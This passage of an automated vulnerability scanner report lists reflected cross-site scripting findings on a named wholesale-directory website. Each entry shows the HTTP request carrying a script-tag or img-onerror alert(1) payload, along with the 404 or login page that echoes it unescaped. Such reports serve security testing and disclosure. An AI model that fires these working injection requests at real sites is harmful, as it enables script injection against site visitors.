Path:	/goods-wholesale/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e4763<script>alert(1)</script>f22048b5af9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/search.phpe4763<script>alert(1)</script>f22048b5af9?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/search.phpe4763<script>alert(1)</script>f22048b5af9?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3917. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fbfcb<a>a0541fccc41 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Searchfbfcb<a>a0541fccc41&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Searchfbfcb<a>a0541fccc41&opt=2 was not found on this server.</p>
...[SNIP]...

2.3918. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 6b84c<a>d699cf5c76 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/search.php?keyword=search...6b84c<a>d699cf5c76&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/search.php?keyword=search...6b84c<a>d699cf5c76&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3919. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload adc05<script>alert(1)</script>fa58f1fb939 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&adc05<script>alert(1)</script>fa58f1fb939=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&adc05<script>alert(1)</script>fa58f1fb939=1 was not found on this server.</p>
...[SNIP]...

2.3920. http://www.resellerbase.com/goods-wholesale/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9dcad<a>9b176a56b1d was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=29dcad<a>9b176a56b1d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=29dcad<a>9b176a56b1d was not found on this server.</p>
...[SNIP]...

2.3921. http://www.resellerbase.com/goods-wholesale/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4cfc2<script>alert(1)</script>2b4b9b3b1db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale4cfc2<script>alert(1)</script>2b4b9b3b1db/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale4cfc2<script>alert(1)</script>2b4b9b3b1db/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3922. http://www.resellerbase.com/goods-wholesale/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 72b28<script>alert(1)</script>7f99d5b8696 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes72b28<script>alert(1)</script>7f99d5b8696/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes72b28<script>alert(1)</script>7f99d5b8696/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3923. http://www.resellerbase.com/goods-wholesale/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4496d<script>alert(1)</script>83c328e920b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/search.php4496d<script>alert(1)</script>83c328e920b?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/search.php4496d<script>alert(1)</script>83c328e920b?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3924. http://www.resellerbase.com/goods-wholesale/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fec3d<a>205be6d806b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/search.php?keyword=search...&Submit3=Searchfec3d<a>205be6d806b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/search.php?keyword=search...&Submit3=Searchfec3d<a>205be6d806b&opt=2 was not found on this server.</p>
...[SNIP]...

2.3925. http://www.resellerbase.com/goods-wholesale/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d2e6d<a>677235b1675 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/search.php?keyword=search...d2e6d<a>677235b1675&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/search.php?keyword=search...d2e6d<a>677235b1675&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3926. http://www.resellerbase.com/goods-wholesale/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5e8c7<script>alert(1)</script>7adef2a3781 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/search.php?keyword=search...&Submit3=Search&opt=2&5e8c7<script>alert(1)</script>7adef2a3781=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/search.php?keyword=search...&Submit3=Search&opt=2&5e8c7<script>alert(1)</script>7adef2a3781=1 was not found on this server.</p>
...[SNIP]...

2.3927. http://www.resellerbase.com/goods-wholesale/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/goods-wholesale/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7c2e5<a>baf365460cf was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/search.php?keyword=search...&Submit3=Search&opt=27c2e5<a>baf365460cf HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/search.php?keyword=search...&Submit3=Search&opt=27c2e5<a>baf365460cf was not found on this server.</p>
...[SNIP]...

2.3928. http://www.resellerbase.com/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1dedd<script>alert(1)</script>a2c4c3c22c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /googlepr.php1dedd<script>alert(1)</script>a2c4c3c22c8?link_id=12 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:58:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /googlepr.php1dedd<script>alert(1)</script>a2c4c3c22c8?link_id=12 was not found on this server.</p>
...[SNIP]...

2.3929. http://www.resellerbase.com/hot.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/hot.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 503cf<script>alert(1)</script>af5c84f45d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hot.php503cf<script>alert(1)</script>af5c84f45d1 HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /hot.php503cf<script>alert(1)</script>af5c84f45d1 was not found on this server.</p>
...[SNIP]...

2.3930. http://www.resellerbase.com/index.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f4091<script>alert(1)</script>c0d98d8a04a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.phpf4091<script>alert(1)</script>c0d98d8a04a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:30:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /index.phpf4091<script>alert(1)</script>c0d98d8a04a was not found on this server.</p>
...[SNIP]...

2.3931. http://www.resellerbase.com/login.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/login.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2708e<script>alert(1)</script>809c8ff1917 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login.php2708e<script>alert(1)</script>809c8ff1917?f=1&b=%2Fcp%2F HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /login.php2708e<script>alert(1)</script>809c8ff1917?f=1&b=%2Fcp%2F was not found on this server.</p>
...[SNIP]...

2.3932. http://www.resellerbase.com/login.php [b parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/login.php

Issue detail

The value of the b request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37276"><img%20src%3da%20onerror%3dalert(1)>3a9b72f7f13 was submitted in the b parameter. This input was echoed as 37276\"><img src=a onerror=alert(1)>3a9b72f7f13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login.php?f=1&b=%2Fcp%2F37276"><img%20src%3da%20onerror%3dalert(1)>3a9b72f7f13 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:23:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Content-Type: text/html
Content-Length: 9270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/cp/37276\"><img src=a onerror=alert(1)>3a9b72f7f13" />
...[SNIP]...

2.3933. http://www.resellerbase.com/login.php [f parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/login.php

Issue detail

The value of the f request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3988f"><img%20src%3da%20onerror%3dalert(1)>bdfb399a39b was submitted in the f parameter. This input was echoed as 3988f\"><img src=a onerror=alert(1)>bdfb399a39b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /login.php?f=13988f"><img%20src%3da%20onerror%3dalert(1)>bdfb399a39b&b=%2Fcp%2F HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 21:22:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Content-Type: text/html
Content-Length: 9252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login</title>
<meta
...[SNIP]...
